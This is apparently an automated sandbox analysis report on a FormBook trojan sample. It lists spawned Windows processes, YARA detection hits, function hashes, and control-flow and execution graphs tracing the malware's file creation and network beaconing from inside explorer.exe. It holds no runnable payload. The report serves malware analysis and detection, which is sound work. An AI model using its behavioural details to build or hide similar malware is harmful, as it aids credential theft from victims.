                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                  Imagebase:0x5d0000
                                                                                                                  File size:480256 bytes
                                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:18:58:05
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                                                                  Imagebase:0xb90000
                                                                                                                  File size:221696 bytes
                                                                                                                  MD5 hash:650FE7460630188008BF8C8153526CEB
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:18:59:22
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff6de9e0000
                                                                                                                  File size:4849904 bytes
                                                                                                                  MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:18:59:29
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                  Imagebase:0x9d0000
                                                                                                                  File size:23040 bytes
                                                                                                                  MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:18:59:43
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                                                                  Imagebase:0xb90000
                                                                                                                  File size:221696 bytes
                                                                                                                  MD5 hash:650FE7460630188008BF8C8153526CEB
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:18:59:52
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                                                                  Imagebase:0xb90000
                                                                                                                  File size:221696 bytes
                                                                                                                  MD5 hash:650FE7460630188008BF8C8153526CEB
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:18:59:52
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                  Imagebase:0x7ff78c800000
                                                                                                                  File size:597432 bytes
                                                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:18:59:57
                                                                                                                  Start date:13/02/2023
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 4496 -s 284
                                                                                                                  Imagebase:0x7ff652d00000
                                                                                                                  File size:568632 bytes
                                                                                                                  MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFB0DE750D1 Relevance: .3, Instructions: 322COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2812959213.00007FFB0DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB0DE70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb0de70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8223f853c1c4a0c15daea33ecc4b2c83421b1f2b3bbdf3f456175b87909a2451
                                                                                                                    • Instruction ID: fc1b1021b41d67080739a83ab9bb83a61d400bf86c336dbdce492646f3c2958b
                                                                                                                    • Opcode Fuzzy Hash: 8223f853c1c4a0c15daea33ecc4b2c83421b1f2b3bbdf3f456175b87909a2451
                                                                                                                    • Instruction Fuzzy Hash: 9AA1036250E7C25FD7569B38D8A19E57FA0DF97220B1844FFD0C9CB0A3F914A84AC392
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FFB0DE73535 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2812959213.00007FFB0DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB0DE70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb0de70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                                    • Instruction ID: 46435e12230e486132d01dbc4b9838270c0895f1fd1ac916013dbe170cf59483
                                                                                                                    • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                                    • Instruction Fuzzy Hash: 2401677111CB0C8FDB88EF0CE451AA5B7E0FB99324F10056DE58AC36A1DA36E882CB45
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FFB0DE7524F Relevance: .0, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2812959213.00007FFB0DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB0DE70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb0de70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d0ffeb32fba49b311ba3567dc52648809b33d9a6a067cb6dbbc230aa36786d3
                                                                                                                    • Instruction ID: 7690a70a017ea080442c2ffe8f971bf01c5a9d38d919c53fcae5939169bdf756
                                                                                                                    • Opcode Fuzzy Hash: 1d0ffeb32fba49b311ba3567dc52648809b33d9a6a067cb6dbbc230aa36786d3
                                                                                                                    • Instruction Fuzzy Hash: 83F0307271CB448FDA98DA1CF4419B973E1EB99320B10062EF08BC2696EA26E8428645
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFB0DE72A6A Relevance: 5.5, Strings: 4, Instructions: 451COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2812959213.00007FFB0DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB0DE70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffb0de70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;$Fo_H$Go_H$Ho_H
                                                                                                                    • API String ID: 0-1477141267
                                                                                                                    • Opcode ID: ecdc742d495049106a69d26ff60c32e41c81a3aad053711ee2e3921d1e844911
                                                                                                                    • Instruction ID: 06f711acd6b0ee163e9151082981f63e4d9b207ac92cec1fbf6689ea12c25aff
                                                                                                                    • Opcode Fuzzy Hash: ecdc742d495049106a69d26ff60c32e41c81a3aad053711ee2e3921d1e844911
                                                                                                                    • Instruction Fuzzy Hash: D0C1FAA2A0DA874FEB92DB7CD8A59E57FD0EF6A21470840F7D1C8CB1D3ED1498468351
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:26.3%
                                                                                                                    Total number of Nodes:133
                                                                                                                    Total number of Limit Nodes:10
                                                                                                                    execution_graph 7722 de754d5 7723 de75587 7722->7723 7724 de754ff 7722->7724 7725 de75ff2 NtCreateFile 7724->7725 7726 de75528 7724->7726 7725->7726 7726->7723 7727 de7c482 10 API calls 7726->7727 7728 de7557f 7727->7728 7729 de753f2 9 API calls 7728->7729 7729->7723 7584 de7c7e2 7585 de7c80b 7584->7585 7587 de7c8e6 7584->7587 7586 de7c9c8 NtCreateFile 7585->7586 7585->7587 7586->7587 7588 de75592 7593 de755b3 7588->7593 7589 de75678 7590 de755e2 SleepEx 7590->7590 7590->7593 7593->7589 7593->7590 7595 de7c482 7593->7595 7600 de75ff2 7593->7600 7610 de753f2 7593->7610 7597 de7c4b9 7595->7597 7596 de7c548 7596->7593 7596->7596 7597->7596 7599 de7c531 SleepEx 7597->7599 7614 de7d4c2 7597->7614 7599->7597 7601 de7601b 7600->7601 7608 de76093 7600->7608 7601->7608 7646 de7c7e2 7601->7646 7603 de76060 7604 de7608f 7603->7604 7650 de75c52 7603->7650 7605 de7c7e2 NtCreateFile 7604->7605 7604->7608 7605->7608 7607 de76080 7607->7604 7659 de75b22 7607->7659 7608->7593 7611 de7540b 7610->7611 7613 de754a9 7610->7613 7612 de7d4c2 9 API calls 7611->7612 7612->7613 7613->7593 7615 de7d4f5 7614->7615 7618 de7d5bf 7615->7618 7621 de7db3f 7615->7621 7633 de79ee2 7615->7633 7617 de7d680 7617->7621 7622 de7d708 7617->7622 7636 de7a062 7617->7636 7618->7617 7620 de7d65c getaddrinfo 7618->7620 7618->7621 7620->7617 7621->7597 7622->7621 7623 de7db27 7622->7623 7632 de7dc78 7622->7632 7639 de79d22 7623->7639 7626 de7dcee 7627 de7dd0f SleepEx 7626->7627 7628 de7dd1b 7626->7628 7627->7621 7628->7621 7629 de7dda0 setsockopt recv 7628->7629 7629->7621 7630 de7ddfd 7629->7630 7630->7621 7631 de7de06 recv 7630->7631 7631->7621 7631->7630 7643 de79fe2 7632->7643 7634 de79f3e socket 7633->7634 7635 de79f19 7633->7635 7634->7618 7635->7634 7637 de7a0bc connect 7636->7637 7638 de7a097 7636->7638 7637->7622 7638->7637 7641 de79d5b 7639->7641 7640 de79e5d 7640->7621 7641->7640 7642 de79e56 SleepEx 7641->7642 7642->7640 7644 de7a039 send 7643->7644 7645 de7a014 7643->7645 7644->7626 7645->7644 7647 de7c80b 7646->7647 7649 de7c8e6 7646->7649 7648 de7c9c8 NtCreateFile 7647->7648 7647->7649 7648->7649 7649->7603 7651 de75fde 7650->7651 7652 de75c7a 7650->7652 7651->7607 7652->7651 7653 de7c7e2 NtCreateFile 7652->7653 7654 de75dc0 7653->7654 7655 de7c7e2 NtCreateFile 7654->7655 7658 de75f9d 7654->7658 7656 de75f8a 7655->7656 7657 de7c7e2 NtCreateFile 7656->7657 7657->7658 7658->7607 7660 de75b40 7659->7660 7661 de75b54 7659->7661 7660->7604 7662 de7c7e2 NtCreateFile 7661->7662 7663 de75c13 7662->7663 7663->7604 7664 de75692 7665 de756a9 7664->7665 7666 de756f9 7665->7666 7667 de756d3 CreateThread 7665->7667 7710 de781b2 7712 de78267 7710->7712 7711 de78405 7712->7711 7714 de77e52 7712->7714 7716 de77f49 7714->7716 7715 de78192 7715->7711 7716->7715 7718 de77682 7716->7718 7719 de776de 7718->7719 7720 de7c7e2 NtCreateFile 7719->7720 7721 de777f4 7720->7721 7721->7716 7730 de77e51 7732 de77f49 7730->7732 7731 de78192 7732->7731 7733 de77682 NtCreateFile 7732->7733 7733->7732 7668 de772bd 7669 de772d4 7668->7669 7676 de78fa2 7669->7676 7671 de772dc 7672 de753f2 9 API calls 7671->7672 7673 de772e4 7672->7673 7674 de77360 7673->7674 7680 de754e2 7673->7680 7677 de78fe7 7676->7677 7688 de78e52 7677->7688 7679 de7912d 7679->7671 7681 de75587 7680->7681 7682 de754ff 7680->7682 7681->7673 7683 de75ff2 NtCreateFile 7682->7683 7684 de75528 7682->7684 7683->7684 7684->7681 7685 de7c482 10 API calls 7684->7685 7686 de7557f 7685->7686 7687 de753f2 9 API calls 7686->7687 7687->7681 7689 de78e7e 7688->7689 7692 de78452 7689->7692 7691 de78e8b 7691->7679 7693 de784c4 7692->7693 7694 de7853f 7693->7694 7695 de7852e ObtainUserAgentString 7693->7695 7694->7691 7695->7694 7696 de75fed 7697 de7601b 7696->7697 7705 de76093 7696->7705 7698 de7c7e2 NtCreateFile 7697->7698 7697->7705 7699 de76060 7698->7699 7700 de7608f 7699->7700 7702 de75c52 NtCreateFile 7699->7702 7701 de7c7e2 NtCreateFile 7700->7701 7700->7705 7701->7705 7703 de76080 7702->7703 7703->7700 7704 de75b22 NtCreateFile 7703->7704 7704->7700 7706 de753eb 7707 de7540b 7706->7707 7709 de754a9 7706->7709 7708 de7d4c2 9 API calls 7707->7708 7708->7709

                                                                                                                    Executed Functions

                                                                                                                    Function 0DE7D4C2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 de7d4c2-de7d4f3 1 de7d4f5-de7d4f9 0->1 2 de7d513-de7d516 0->2 1->2 5 de7d4fb-de7d4ff 1->5 3 de7db85-de7db92 2->3 4 de7d51c-de7d522 2->4 4->3 6 de7d528-de7d53c 4->6 5->2 7 de7d501-de7d505 5->7 9 de7d544-de7d545 6->9 10 de7d53e-de7d542 6->10 7->2 8 de7d507-de7d50b 7->8 8->2 11 de7d50d-de7d511 8->11 12 de7d54f-de7d558 9->12 10->9 10->12 11->2 11->4 13 de7d56f-de7d573 12->13 14 de7d55a-de7d55e 12->14 16 de7d57b-de7d59e 13->16 17 de7d575 13->17 15 de7d560-de7d56d 14->15 14->16 15->17 18 de7d5a6-de7d5ba call de79ee2 16->18 19 de7d5a0-de7d5a4 16->19 17->16 22 de7d5bf-de7d5dc 18->22 19->18 20 de7d5e2-de7d5e9 19->20 23 de7d693-de7d6a3 20->23 24 de7d5ef-de7d5f7 20->24 22->20 25 de7db75-de7db7e 22->25 23->25 28 de7d6a9-de7d6b9 23->28 26 de7d627-de7d63a 24->26 27 de7d5f9-de7d621 call de75012 call de7ce82 24->27 25->3 26->25 32 de7d640-de7d646 26->32 27->26 29 de7d6d3-de7d6e5 28->29 30 de7d6bb-de7d6cc call de79e82 28->30 34 de7d6e7-de7d703 call de7a062 29->34 35 de7d748-de7d76d 29->35 30->29 32->25 37 de7d64c-de7d64e 32->37 44 de7d708-de7d730 34->44 41 de7d76f-de7d78a call de7e2e2 35->41 42 de7d78c-de7d790 35->42 37->25 43 de7d654-de7d656 37->43 58 de7d7d4 call de7e2e2 41->58 48 de7d796-de7d79a 42->48 49 de7db65-de7db66 42->49 43->25 47 de7d65c-de7d67e getaddrinfo 43->47 44->35 51 de7d732-de7d73e 44->51 47->23 53 de7d680-de7d688 47->53 48->49 54 de7d7a0-de7d7a4 48->54 50 de7db6d-de7db6e 49->50 50->25 51->50 57 de7d744 51->57 53->23 55 de7d7a6-de7d7aa 54->55 56 de7d7ac-de7d7d2 call de7e2e2 54->56 55->56 59 de7d7d9-de7d889 call de7e2b2 call de7b372 call de7b362 * 2 call de7e2b2 call de7a7a2 call de7e4d2 55->59 56->58 57->35 58->59 77 de7d89d-de7d8fd call de7e2e2 59->77 78 de7d88b-de7d88f 59->78 83 de7d903-de7d942 call de7e2b2 call de7e762 call de7e4d2 77->83 84 de7d9f0-de7dadd call de7e2b2 call de7e762 * 4 call de7e4d2 * 2 call de7b362 * 2 77->84 78->77 79 de7d891-de7d898 call de7aca2 78->79 79->77 97 de7d964-de7d995 call de7e762 * 2 83->97 98 de7d944-de7d960 call de7e762 call de7e4d2 83->98 116 de7dae2-de7db06 call de7e762 84->116 113 de7d997-de7d9b9 call de7e4d2 call de7e762 97->113 114 de7d9be-de7d9c2 97->114 98->97 113->114 114->116 117 de7d9c8-de7d9eb call de7e762 114->117 127 de7db93-de7dc72 call de7e762 * 7 call de7e4d2 call de7e2b2 call de7e4d2 call de7a7a2 call de7aca2 116->127 128 de7db0c-de7db21 call de7e762 call de7e4d2 116->128 117->116 141 de7db27-de7db3a call de79d22 127->141 188 de7dc78-de7dc7f 127->188 140 de7dcc7-de7dcf0 call de79fe2 128->140 128->141 151 de7dcf2-de7dd07 140->151 152 de7dd1b-de7dd1f 140->152 147 de7db3f-de7db61 call de7a0e2 141->147 147->49 151->152 157 de7dd09-de7dd0d 151->157 153 de7dd33-de7dd47 152->153 154 de7dd21-de7dd25 152->154 160 de7dd65-de7ddfb call de7e2e2 call de7e2b2 setsockopt recv 153->160 161 de7dd49-de7dd5f 153->161 158 de7de52-de7de88 call de7a0e2 154->158 159 de7dd2b-de7dd2d 154->159 157->152 163 de7dd0f-de7dd16 SleepEx 157->163 158->49 159->153 159->158 175 de7ddfd 160->175 176 de7de3b-de7de48 160->176 161->158 161->160 163->158 175->176 178 de7ddff-de7de04 175->178 176->158 178->176 180 de7de06-de7de39 recv 178->180 180->175 180->176 189 de7dc81-de7dc88 188->189 190 de7dca9-de7dcb4 188->190 191 de7dca0-de7dca7 189->191 192 de7dc8a-de7dc96 189->192 190->140 193 de7dcb6-de7dcc1 190->193 191->190 194 de7dcc3-de7dcc4 191->194 192->191 193->140 194->140
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                                                                    • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                    • API String ID: 878647675-2045366144
                                                                                                                    • Opcode ID: 1725d26c03797564fb6383ea6b78f9c730581f6f5adbabcc062eec56e0506289
                                                                                                                    • Instruction ID: af695588cba5901f925acc4a8d7f0c840550fcf4182f948cb36f7fa845d59b7f
                                                                                                                    • Opcode Fuzzy Hash: 1725d26c03797564fb6383ea6b78f9c730581f6f5adbabcc062eec56e0506289
                                                                                                                    • Instruction Fuzzy Hash: 86529230618B088FCBA9EF28D8886EAB3E1FF94308F54552DD59BD7146EF34E5468742
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7C7E2 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 594filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 220 de7c7e2-de7c805 221 de7c80b-de7c80f 220->221 222 de7cdfa-de7ce08 220->222 221->222 223 de7c815-de7c854 221->223 224 de7c856-de7c85a 223->224 225 de7c872-de7c873 223->225 224->225 226 de7c85c-de7c860 224->226 227 de7c878 225->227 228 de7c867-de7c86b 226->228 229 de7c862-de7c865 226->229 230 de7c87d-de7c881 227->230 228->230 231 de7c86d-de7c870 228->231 229->227 232 de7c883-de7c8a9 call de7ce82 230->232 233 de7c8ab-de7c8bd 230->233 231->230 232->233 238 de7c92a 232->238 237 de7c8bf-de7c8e4 233->237 233->238 239 de7c8e6-de7c8ed 237->239 240 de7c959-de7c960 237->240 241 de7c92c-de7c958 238->241 242 de7c8ef-de7c912 call de7ce82 239->242 243 de7c918-de7c922 239->243 244 de7c962-de7c98b call de7ce82 240->244 245 de7c98d-de7c994 240->245 242->243 243->238 247 de7c924-de7c925 243->247 244->238 244->245 249 de7c996-de7c9c2 call de7ce82 245->249 250 de7c9c8-de7ca0f NtCreateFile call de7c722 245->250 247->238 249->238 249->250 256 de7ca14-de7ca16 250->256 256->238 257 de7ca1c-de7ca24 256->257 257->238 258 de7ca2a-de7ca2d 257->258 259 de7ca2f-de7ca38 258->259 260 de7ca3d-de7ca44 258->260 259->241 261 de7ca46-de7ca6f call de7ce82 260->261 262 de7ca79-de7caa6 260->262 261->238 269 de7ca75-de7ca76 261->269 267 de7caac-de7caaf 262->267 268 de7cdeb-de7cdf5 262->268 270 de7cab5-de7cab8 267->270 271 de7cb38-de7cb45 267->271 268->238 269->262 272 de7cabe-de7cac5 270->272 273 de7cb4a-de7cb4d 270->273 271->241 275 de7cac7-de7caf0 call de7ce82 272->275 276 de7caf6-de7cb2e 272->276 278 de7cb53-de7cb5a 273->278 279 de7cbee-de7cbf1 273->279 275->238 275->276 276->271 283 de7cb5c-de7cb85 call de7ce82 278->283 284 de7cb8b-de7cb9f call de7e332 278->284 281 de7cbf3-de7cbfa 279->281 282 de7cc71-de7cc74 279->282 290 de7cbfc-de7cc25 call de7ce82 281->290 291 de7cc2b-de7cc6c 281->291 286 de7ccff-de7cd02 282->286 287 de7cc7a-de7cc81 282->287 283->238 283->284 284->238 300 de7cba5-de7cbe9 284->300 286->238 296 de7cd08-de7cd0f 286->296 293 de7cc83-de7ccac call de7ce82 287->293 294 de7ccb2-de7ccfa 287->294 290->268 290->291 306 de7cdd1-de7cde6 291->306 293->268 293->294 294->306 301 de7cd37-de7cd3e 296->301 302 de7cd11-de7cd31 call de7ce82 296->302 300->241 304 de7cd66-de7cd70 301->304 305 de7cd40-de7cd60 call de7ce82 301->305 302->301 304->268 311 de7cd72-de7cd79 304->311 305->304 306->241 311->268 315 de7cd7b-de7cdc3 311->315 315->306
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 823142352-2679148245
                                                                                                                    • Opcode ID: dc3611c6621337a4705fb43b90c18ab6f806b77f01b00a2577724ad26c2a59d4
                                                                                                                    • Instruction ID: f7ca59bc5cd62914b0636ee42af2df2de1349613f4991bfc27df9736cfbedba0
                                                                                                                    • Opcode Fuzzy Hash: dc3611c6621337a4705fb43b90c18ab6f806b77f01b00a2577724ad26c2a59d4
                                                                                                                    • Instruction Fuzzy Hash: A9125070618A098FDB99DF28C485ABAF7E4FB98305F50562EE59ED3250DF30E451CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE78452 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,0DE78E8B), ref: 0DE78539
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                    • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                    • API String ID: 2681117516-1987325725
                                                                                                                    • Opcode ID: 643ce90686be2a6d25da55d7c2a168e17e2a139069be50c95b7cfc66e0d0a4da
                                                                                                                    • Instruction ID: 5ffe851cbfa2041b2cbe165e9019acad95cebd2aedf0baa9b77c272fb2fa39bc
                                                                                                                    • Opcode Fuzzy Hash: 643ce90686be2a6d25da55d7c2a168e17e2a139069be50c95b7cfc66e0d0a4da
                                                                                                                    • Instruction Fuzzy Hash: E231C231718A4D8BCB85EFA8C8847EEB7E1FB58204F41126AD55ED7240EE78C6458785
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7A062 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 215 de7a062-de7a095 216 de7a097-de7a0b9 call de7ce82 215->216 217 de7a0bc-de7a0dc connect 215->217 216->217
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connect
                                                                                                                    • String ID: conn$ect
